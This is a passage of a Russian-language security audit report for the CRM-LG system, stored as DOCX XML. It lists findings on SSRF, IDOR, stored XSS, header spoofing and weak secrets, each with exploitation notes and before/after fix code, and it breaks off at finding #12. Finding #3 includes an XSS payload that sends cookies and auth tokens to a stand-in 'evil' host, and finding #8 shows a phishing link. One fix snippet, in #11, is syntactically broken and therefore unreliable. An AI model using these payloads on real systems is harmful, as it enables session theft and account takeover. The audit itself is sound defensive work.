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800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Аудит безопасности CRM-LG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center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Backend (FastAPI) · Frontend (React) · Infra (Yandex Cloud)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120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Дата: 28 мая 2026 · Глубина: code review с цитатами и фикс-сниппетами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3120"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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P0 Критично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P1 Высокий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P2 Средний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P3 Низкий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Итого находок</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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C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9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6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15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6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3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19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Executive Summary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Аудит покрыл три слоя CRM-LG: backend (FastAPI + Postgres + Redis + Playwright), frontend (React + Vite + TanStack Router + zustand) и инфраструктуру (Yandex Cloud VM с docker-compose, nginx, certbot, Object Storage). Базовая гигиена аутентификации (bcrypt, rotation refresh-токенов, lockout, httpOnly+Strict cookie) сделана хорошо. Проблемы концентрируются в местах, где user-supplied контент достигает чувствительных контекстов: рендеринг HTML (Playwright PDF, чат-поиск, document-body) и проверка прав на скачивание файлов.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Четыре находки уровня P0 требуют немедленного исправления. Они напрямую ведут к утечке IAM-токенов VM (#1), скачиванию чужих файлов (#2) и stored XSS с возможностью полного takeover админ-сессии (#3, #4). Остальные находки повышают эксплуатируемость P0 (нет CSP, нет санитизации, root в контейнере) и должны быть закрыты в течение спринта.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Что аудитировалось и как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Сделан ручной code review по checklist: OWASP ASVS-категории доступа, секретов, ввода/вывода, конфигурации, конкретно по доменам ПДн (ФЗ-152). Использован grep по всему репозиторию по якорным паттернам (dangerouslySetInnerHTML, text(), execute, render-pdf, X-Forwarded-For, chmod, USER, jwt, cookie, allow_origins), плюс точечное чтение модулей auth, files, documents, chat, realtime, vacancies, candidates, users, users/invites, integrations/email, integrations/s3, integrations/yandex_gpt, infra (docker-compose.prod.yml, nginx.example.conf, terraform/main.tf, infra/scripts/*).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 отчёте каждая находка идёт с (а) severity и областью; (б) точным file:line; (в) описанием эксплуатации; (г) фикс-сниппетом «было → стало». Severity использует упрощённую шкалу OWASP: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P0 Критично — даёт компрометацию данных или захват сессии без сложных предусловий.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P1 Высокий — даёт компрометацию или сильно расширяет поверхность P0.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P2 Средний — снижает уровень защиты, требует комбинации с другими дефектами.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P3 Низкий — гигиена и улучшения в глубину.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Дорожная карта исправлений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Горизонт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Что закрыть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Сейчас (1-2 дня)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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#1 SSRF render-pdf · #2 IDOR на files · #3 XSS documents · #4 XSS chat search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Эта неделя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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#5 X-Forwarded-For · #6 TLS chmod · #7 root в контейнере · #8 HTML-escape в письме · #10 CSP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 течение спринта</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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#9 SRI/bundle pdf.js · #11 fail-fast по секретам · #12 docs off в prod · #13 политика паролей</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Бэклог</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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#14 ClamAV · #15 WS-ticket вместо jwt в query · #16 строгий CORS · #17 SSH-CIDR · #18 шифрование бэкапов · #19 rate-limit AI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Находки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#1  SSRF и утечка метаданных VM через /files/render-pdf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C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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P0 · Критично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Область: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Backend · файлы / интеграция Playwright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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/api/v1/endpoints/files.py:138-168, backend/app/modules/files/pdf_service.py:6-19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Эндпоинт POST /api/v1/files/render-pdf принимает произвольный HTML от любого авторизованного пользователя и рендерит его в Chromium через Playwright с networkidle. Сетевые запросы из HTML (img/script/iframe/fetch через &lt;link rel="prefetch"&gt; и т.п.) выполняются прямо из контейнера backend в полной egress-сети.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Из docker-compose.prod.yml egress открыт во внешнюю сеть, а из контейнера доступны: postgres (внутренняя сеть docker), redis, host metadata Yandex Cloud (169.254.169.254/computeMetadata/v1), любые внутренние адреса VPC.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Почему это опасно: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Утечка короткоживущих IAM-токенов сервис-аккаунта VM через metadata-эндпоинт Yandex Cloud → захват S3-бакетов с файлами и бэкапами БД.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Сканирование внутренней сети и подбор паролей к внутренним сервисам в Yandex VPC.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Эксфильтрация любых внутренних URL: содержимое отрендерится в выдаваемый PDF и скачается клиентом.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Используется Playwright (Chromium), который превосходит curl: выполняет JS, поддерживает редиректы, печет полученные данные в финальный PDF — стандартный SSRF-фильтр по схеме недостаточен.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 исправить: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Блокировать всю сеть в Playwright через route-handler, оставив только data:/about:blank, либо рендерить «офлайн» через page.setContent с wait_until="load" вместо "networkidle" и одновременно перехватывать все запросы.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Альтернатива: серверная санитизация HTML до подмножества тегов без внешних ресурсов (Bleach с allow-list), и render строго с wait_until="load".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Дополнительно: добавить в Yandex Cloud метку «отключить metadata-endpoint» (use_token_v2) и/или iptables-правило на VM, блокирующее 169.254.169.254 для docker-сети backend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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async def render_pdf_from_html(html: str) -&gt; bytes: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async with async_playwright() as p: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    browser = await p.chromium.launch()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    page = await browser.new_page()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    await page.set_content(html, wait_until="networkidle")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    return await page.pdf(format="A4", ...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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async def render_pdf_from_html(html: str) -&gt; bytes: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async with async_playwright() as p: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    browser = await p.chromium.launch(args=["--no-sandbox", "--disable-features=NetworkService"])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    ctx = await browser.new_context()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    # Блокируем ВСЕ внешние запросы: только data: и about:blank пройдут.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    async def _block(route):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        url = route.request.url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        if url.startswith(("data:", "about:")):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            await route.continue_()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        else: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            await route.abort()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    await ctx.route("**/*", _block)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    page = await ctx.new_page()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    await page.set_content(html, wait_until="load")  # не networkidle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    return await page.pdf(format="A4", ...)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#2  IDOR: любой авторизованный скачивает любой файл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C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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P0 · Критично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Область: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Backend · доступ к файлам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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/modules/files/service.py:103-126 (ensure_can_read_file)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Функция ensure_can_read_file явно возвращает без проверок для всех entity_type, кроме chat_message. Комментарий в коде это признаёт: «исторически „любой авторизованный“ — это устаревшая логика». В результате эндпоинт GET /api/v1/files/{file_id}/download выдаёт presigned URL на S3 для файла любой вакансии, кандидата, клиента или контакта — достаточно знать UUID.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UUID не «секрет»: они утекают в realtime-события (vacancy.changed / candidate.changed подписаны на всех пользователей без фильтрации audience), в /audit, в активность сущностей.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Почему это опасно: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Резюме кандидатов, договоры клиентов, скан-копии паспортов и юр.лиц — всё хранится в одном бакете без enforcement доступа по роли/принадлежности.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Любой viewer / recruiter junior получает доступ ко всем коммерческим документам клиентов.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Нарушение требований по обработке ПДн (ФЗ-152): доступ к ПДн кандидата должен быть ограничен по принципу необходимости.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 исправить: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Реализовать проверку прав для всех entity_type, не только chat_message. Минимум: vacancy/candidate — через permissions-matrix роли и владельца (recruiter_id / account_manager_id); client/contact — аналогично; documents — через owner_user_id + (опц.) shared-список.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Все 404 должны возвращаться единым кодом, чтобы не палить существование файла.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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async def ensure_can_read_file(db, user, file) -&gt; None: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if file.entity_type != FileEntityType.chat_message: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    return  # «любой авторизованный»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# ... только для chat_message проверяем членство</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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async def ensure_can_read_file(db, user, file) -&gt; None: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et = file.entity_type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if et == FileEntityType.chat_message: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    # ... как было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    return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if et == FileEntityType.candidate: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    cand = await db.get(Candidate, file.entity_id)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    if cand is None: raise NotFound()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    if not _can_read_candidate(user, cand): raise NotFound()  # 404, не 403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    return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if et == FileEntityType.vacancy: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    vac = await db.get(Vacancy, file.entity_id)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    if vac is None or not _can_read_vacancy(user, vac): raise NotFound()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    return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# client / contact / document — аналогично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raise NotFound()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#3  Stored XSS в documents.body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C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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P0 · Критично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Область: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Backend + Frontend · модуль documents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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/modules/documents/service.py:317,352 (запись body без санитизации); frontend/src/features/documents/NoteEditor.tsx:262 (dangerouslySetInnerHTML)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Поле body документа-заметки записывается в БД в исходном виде из API (никакой санитизации), а NoteViewer на фронте рендерит его через dangerouslySetInnerHTML. Комментарий «доверенный собственный вывод Tiptap» неверен: атакующий вызывает PATCH /documents/{id} напрямую через API и кладёт произвольный HTML — Tiptap при этом не участвует.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Эксплуатация: любой пользователь с правом documents:write создаёт документ, заполняет body значением &lt;img src=x onerror="fetch('https://evil/' + document.cookie + ' ' + (window.__zustand_auth__||''))"&gt;. Любой другой пользователь, открыв предпросмотр, получает выполнение скрипта в контексте приложения с доступом к access-токену в zustand-сторе.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Почему это опасно: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XSS работает в админ-сессии → полный takeover (создание admin-пользователя через POST /users).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Нет CSP (см. находку #10), поэтому никаких ограничений по выполнению inline-скриптов и outbound-fetch нет.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 исправить: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Санитизировать HTML на бэкенде через bleach с whitelist по тегам/атрибутам Tiptap. Это единственное место, где можно гарантировать защиту — фронт обходится через прямой API-вызов.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Параллельно на фронте — переключиться на DOMPurify перед dangerouslySetInnerHTML; не полагаться на серверную проверку как на единственную защиту.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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# documents/service.py (создание/обновление)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body=payload.body if payload.kind == DocumentKind.note else None,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...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if "body" in provided and doc.kind == DocumentKind.note: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doc.body = payload.body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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import bleach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ALLOWED_TAGS = {"p","br","strong","em","u","s","code","pre","blockquote",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            "ul","ol","li","h1","h2","h3","a","mark"}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ALLOWED_ATTRS = {"a": ["href","title","rel","target"], "*": ["class"]}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def _sanitize_note(html: str | None) -&gt; str | None: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if html is None: return None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return bleach.clean(html, tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRS,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                    protocols=["http","https","mailto"], strip=True)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# при записи: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doc.body = _sanitize_note(payload.body)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#4  XSS через ts_headline в поиске сообщений чата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C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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P0 · Критично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Область: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Backend (chat) + Frontend (SearchResults)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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/modules/chat/service.py:797-872 (ts_headline + StartSel/StopSel); frontend/src/features/chat/SearchResults.tsx:107 (dangerouslySetInnerHTML на hit.snippet)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Бэк формирует snippet через PostgreSQL ts_headline с опциями StartSel=&lt;mark&gt;,StopSel=&lt;/mark&gt;. Комментарий в SearchResults.tsx утверждает: «ts_headline экранирует HTML на входе». Это неверно — ts_headline не санитизирует исходный текст, а просто оборачивает совпадения. Если пользователь отправил в чат сообщение с тегом &lt;img src=x onerror=...&gt;, snippet сохранит этот HTML, и фронт его выполнит при отображении в боковой панели поиска.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Эксплуатация: отправить в DM/группу сообщение, содержащее как минимум одно общеупотребительное слово (чтобы быть в индексе) и XSS-payload. Любой получатель, ищущий это слово, получает XSS.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Почему это опасно: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Это не теоретическая XSS — поиск работает по всем чатам, в которых пользователь состоит. Достаточно одного компрометированного аккаунта, чтобы попасть в чужие сессии.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Поскольку фронт рендерит результат, можно красть access-токен из zustand и подделывать запросы.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 исправить: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Не отдавать сырой HTML в snippet. Варианты по убыванию надёжности: (а) HTML-экранировать текст до подачи в ts_headline и использовать кастомные StartSel/StopSel-токены, потом заменять их на &lt;mark&gt; уже после экранирования; (б) на фронте парсить snippet как plain-text и расставлять &lt;mark&gt; в React-дереве без dangerouslySetInnerHTML; (в) санитизировать snippet через DOMPurify с allow-list только &lt;mark&gt;.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Самый простой вариант — (б): передавать с бэка позиции совпадений вместо HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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# backend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_HEADLINE_OPTIONS = "StartSel=&lt;mark&gt;,StopSel=&lt;/mark&gt;,..."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snippet = func.ts_headline("russian", ChatMessage.text_, tsquery, _HEADLINE_OPTIONS)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// frontend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&lt;span dangerouslySetInnerHTML={{ __html: hit.snippet }} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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# backend — изолированные токены, фронт их подменит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_HEADLINE_OPTIONS = "StartSel=\u2063HL\u2063,StopSel=\u2063/HL\u2063,..."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// frontend — splittext + React, без innerHTML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function highlight(snippet: string) {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return snippet.split(/\u2063HL\u2063|\u2063\/HL\u2063/).map((part, i) =&gt;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i % 2 ? &lt;mark key={i}&gt;{part}&lt;/mark&gt; : &lt;span key={i}&gt;{part}&lt;/span&gt;);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}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&lt;span&gt;{highlight(hit.snippet)}&lt;/span&gt;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#5  Подделка X-Forwarded-For → обход rate-limit логина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9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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P1 · Высокий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Область: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Infra (nginx) + Backend (auth)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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">infra/docker-compose.prod.yml:60 (--forwarded-allow-ips=*); infra/nginx.example.conf:47,61 (X-Forwarded-For $proxy_add_x_forwarded_for); backend/app/api/v1/endpoints/auth.py:43-48 (_client_ip)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uvicorn запускается с --forwarded-allow-ips=*, и nginx ставит X-Forwarded-For через $proxy_add_x_forwarded_for, который добавляет к строке от клиента — не заменяет её. _client_ip() берёт первое значение split(",")[0]. Итог: атакующий шлёт заголовок X-Forwarded-For: &lt;random&gt; при каждом POST /auth/login, и rate-limit в Redis инкрементируется на разные ключи. 5-запросов-в-минуту легко обходится.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Lockout по email остаётся, но он не защищает от password spraying (1 попытка на email × много email-ов).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Почему это опасно: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Брутфорс/спрей-атаки на /auth/login проходят без триггера 429.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Логи аудита и Sentry показывают подделанные IP — расследование инцидента усложняется.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 исправить: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 nginx переписывать X-Forwarded-For, а не дополнять: proxy_set_header X-Forwarded-For $remote_addr; (или использовать X-Real-IP и читать его на бэке).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 uvicorn сузить --forwarded-allow-ips до подсети docker-сети nginx (например, 172.16.0.0/12).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 _client_ip брать X-Real-IP, если задан, и игнорировать X-Forwarded-For от клиента.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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# nginx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proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;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# uvicorn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"--proxy-headers", "--forwarded-allow-ips=*"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# backend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xff = request.headers.get("X-Forwarded-For")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if xff: return xff.split(",")[0].strip()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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# nginx — перезаписываем, не дополняем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proxy_set_header X-Forwarded-For $remote_addr;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proxy_set_header X-Real-IP $remote_addr;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# uvicorn — доверять только docker-сети nginx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"--proxy-headers", "--forwarded-allow-ips=172.16.0.0/12"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# backend — приоритет X-Real-IP, фолбэк на request.client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real_ip = request.headers.get("X-Real-IP")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return real_ip or (request.client.host if request.client else "0.0.0.0")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#6  Приватный TLS-ключ становится world-readable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9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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P1 · Высокий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Область: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Infra · TLS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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">infra/scripts/issue-cert.sh:30 (chmod -R 755 /etc/letsencrypt/live /etc/letsencrypt/archive)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Скрипт выпуска сертификата делает chmod -R 755 на каталоги live и archive в /etc/letsencrypt. Внутри archive лежит privkey*.pem — приватный ключ, который Let's Encrypt по умолчанию создаёт с режимом 600 и владельцем root. Маска 755 делает ключ читаемым для любого пользователя на VM, включая crm (под которым работают контейнеры). Если контейнер компрометируется — атакующий читает приватный ключ напрямую.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Почему это опасно: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Утечка privkey.pem = атакующий может ставить MITM на трафик пользователей (при компрометации DNS/маршрутизации) и расшифровывать перехваченные сессии до ротации сертификата.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Нарушение базовой гигиены: PCI/ISO 27001/152-ФЗ требуют ограничения доступа к ключам подписи и шифрования.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 исправить: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Не менять режимы /etc/letsencrypt/* рекурсивно. Если nginx-контейнеру нужен доступ к ключу, монтировать его через bind-mount с правильным режимом или копировать в infra/certs/ с chmod 640 и owner root:ssl-cert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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chmod -R 755 /etc/letsencrypt/live /etc/letsencrypt/archive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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# Не трогаем рекурсивно. По умолчанию certbot выставит 700/600.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# Если нужен доступ контейнеру nginx — монтируем напрямую с :ro и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# полагаемся на то, что процесс nginx внутри уже работает под root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# (стандартный официальный образ). Никаких chmod -R не требуется.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#7  Backend-контейнер работает от root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9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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P1 · Высокий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Область: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Infra · Dockerfile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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/Dockerfile (нет директивы USER)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backend/Dockerfile не содержит USER — процесс uvicorn запускается под root внутри контейнера. То же относится к Playwright-Chromium, запускаемому процессом из render-pdf (см. #1).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При RCE в Python-коде (любая десериализация, баг в зависимости, успешный SSRF #1) атакующий получает root внутри контейнера: чтение всех env-переменных (JWT_SECRET, S3_SECRET_KEY, SMTP_PASSWORD), запись в смонтированные тома, эксплуатация cap-set по умолчанию.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Почему это опасно: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Root в контейнере = эффективный root на host через docker.sock в случае утечек capabilities или CVE контейнерного рантайма.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Chromium-под-root исторически менее устойчив к sandbox-escape (отсюда флаг --no-sandbox небезопасен под root).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 исправить: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Создать непривилегированного пользователя в Dockerfile и переключиться на него; учесть, что playwright install требует root, а сам запуск — нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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FROM python:3.12-slim AS base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...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RUN python -m playwright install --with-deps chromium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COPY . .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EXPOSE 8000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CMD ["uvicorn", "app.main:app", ...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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FROM python:3.12-slim AS base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...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RUN python -m playwright install --with-deps chromium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COPY . .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# Непривилегированный пользователь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RUN useradd -m -u 10001 -s /usr/sbin/nologin app \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&amp;&amp; chown -R app:app /app /ms-playwright || true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USER app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EXPOSE 8000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CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8000"]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#8  HTML-инъекция в письме-приглашении (full_name без escape)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9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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P1 · Высокий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Область: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Backend · интеграция SMTP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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/integrations/email.py:185-237 (render_invite_email, f-string {full_name})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render_invite_email подставляет full_name в HTML-шаблон письма через f-string без HTML-экранирования. Поле full_name приходит из POST /users (admin) или из PATCH /auth/me (любой пользователь самого себя). Никакой валидации длины/набора символов на бэкенде нет.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Атакующий с правом users:create или просто себе через PATCH /me ставит full_name с разметкой/ссылками. Если приглашает кто-то с правом users:manage, в HTML-письмо вставляется чужая разметка. Дополнительно: ссылка-кнопка использует href="{invite_url}" без экранирования (URL мы контролируем, но при будущей правке шаблона любая мелочь сразу превратится в проблему).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Почему это опасно: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Фишинг через подмену кнопки/ссылки в письме (вставка &lt;a href="https://evil"&gt;Установить пароль&lt;/a&gt;).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Mail-клиенты (Outlook/Mail.ru) рендерят HTML — атакующий может изменить визуальную часть приглашения.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 исправить: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HTML-экранировать любые user-controlled значения перед вставкой в HTML-шаблон. Тривиально через html.escape(). То же относится к subject в plain-text — там безопаснее, но дисциплина одна.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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html = f"""...&lt;h1&gt;...Здравствуйте, {full_name}!&lt;/h1&gt;..."""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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from html import escape as h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safe_name = h(full_name or to)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html = f"""...&lt;h1&gt;...Здравствуйте, {safe_name}!&lt;/h1&gt;..."""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#9  Подгрузка pdf.js с CDN без Subresource Integrity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9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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P1 · Высокий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Область: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Frontend · импорт резюме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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">frontend/src/features/candidates/resumeImport/extractPdfText.ts:13-15,44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pdf.js (~2 МБ) загружается через dynamic import с jsDelivr (https://cdn.jsdelivr.net/npm/pdfjs-dist@4.0.379/...). Никакой SRI-проверки, никакого SHA-пиннинга — компрометация CDN или MITM на пути клиента ведёт к выполнению произвольного JS в контексте приложения CRM.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Почему это опасно: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Supply-chain: атакующий, получивший доступ к npm-публикации pdfjs-dist или к jsDelivr, выполняет код в контексте всех пользователей с access-токеном.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Любой подмены ответа на пути (corp-proxy, MITM, скомпрометированный DNS) достаточно для XSS.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 исправить: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Bundle pdf.js в приложение через npm-зависимость и Vite import. Бандл-сайз увеличится — но компенсируется code-splitting (Vite сделает отдельный chunk, который грузится только при открытии «Распознать из файла»).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Если по продуктовым причинам CDN остаётся — подгружать через &lt;script integrity="sha384-..." crossorigin="anonymous"&gt; с SRI, а не через JS-import.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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const PDFJS_URL = `https://cdn.jsdelivr.net/npm/pdfjs-dist@${PDFJS_VERSION}/build/pdf.min.mjs`;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const mod = await import(/* @vite-ignore */ PDFJS_URL);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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// package.json: "pdfjs-dist": "4.0.379"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const mod = await import('pdfjs-dist/build/pdf.min.mjs');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// worker лежит в node_modules рядом — забираем через ?url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import workerSrc from 'pdfjs-dist/build/pdf.worker.min.mjs?url';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mod.GlobalWorkerOptions.workerSrc = workerSrc;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#10  Нет Content-Security-Policy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DE9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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P1 · Высокий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Область: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Infra · nginx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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">infra/nginx.example.conf:30-34 (только X-Frame-Options, X-Content-Type-Options, Referrer-Policy, HSTS)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Конфиг nginx не выставляет CSP. В сочетании с тремя XSS-векторами выше (#3 documents, #4 chat search, потенциальный #1 через PDF) отсутствие CSP резко повышает эксплуатируемость: можно делать inline-скрипты, fetch на любые домены, eval — нет ни одного слоя защиты в глубину.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Почему это опасно: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CSP не убирает XSS, но при правильной настройке делает кражу токенов через outbound-fetch и инъекцию скриптов невозможной.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CSP также защитит от подгрузки сторонних библиотек (см. #9): нельзя будет тянуть pdf.js с jsDelivr без явного allow-list.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 исправить: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Добавить строгий CSP. Vite-bundle использует только self для скриптов и стилей; единственные внешние ресурсы — jsDelivr (см. #9). Если #9 будет исправлено, allow-list jsDelivr можно убрать.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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add_header X-Frame-Options "DENY" always;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add_header X-Content-Type-Options "nosniff" always;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add_header Referrer-Policy "strict-origin-when-cross-origin" always;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add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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# Базовые заголовки (как было) + CSP + Permissions-Policy + COOP/CORP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add_header X-Frame-Options "DENY" always;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add_header X-Content-Type-Options "nosniff" always;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add_header Referrer-Policy "strict-origin-when-cross-origin" always;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add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;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add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;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add_header Cross-Origin-Opener-Policy "same-origin" always;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# CSP: ничего лишнего, только self + ws/wss + S3 для presigned-картинок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add_header Content-Security-Policy "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default-src 'self';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script-src 'self';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style-src 'self' 'unsafe-inline';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img-src 'self' data: https://storage.yandexcloud.net;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connect-src 'self' wss: https://storage.yandexcloud.net;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font-src 'self' data:;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frame-ancestors 'none';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base-uri 'self';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form-action 'self';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" always;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#11  Дефолтные секреты в коде и слабый bootstrap-чек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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 · Средний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Область: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Backend · конфиг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Где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/app/core/config.py:31,40-41 (jwt_secret="change-me-in-prod", admin_password="change-me"); scripts/bootstrap.sh (grep -qE 'CHANGE_ME|change-me-in-prod')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JWT_SECRET в Settings имеет default "change-me-in-prod" — если переменная окружения не задана (например, опечатка имени), сервер поднимется со слабым ключом, и все токены подделываются.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bootstrap.sh проверяет .env.prod grep-ом на CHANGE_ME — но pydantic читает значения из env. Если в env вообще не задать переменную, никакой проверки не будет, поднимется default.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Аналогично: admin_password="change-me" — если seed-скрипт не переопределил, аккаунт admin@lg.ru имеет известный пароль.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Почему это опасно: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JWT secret = подделка любого access/refresh-токена → полный takeover.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Default admin_password = вход с известными кредами.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 исправить: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Убрать дефолты для критичных секретов и проверять их при старте процесса (fail-fast). Если env=prod и jwt_secret попадает в список «слабых» значений — RuntimeError.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="4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Было: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jwt_secret: str = Field(default="change-me-in-prod")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admin_password: str = "change-me"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before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Стало: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jwt_secret: str = Field(default="")  # обязателен в проде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admin_password: str = ""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@field_validator("jwt_secret")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@classmethod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_WEAK = {"", "change-me-in-prod", "secret", "changeme"}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def _check_secret(cls, v, info):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if info.data.get("env") == "prod" and (v in _WEAK or len(v) &lt; 32):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    raise ValueError("JWT_SECRET must be set to a strong value in prod")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return v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#12  OpenAPI /docs, /redoc и openapi.json публичны в prod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6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292F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
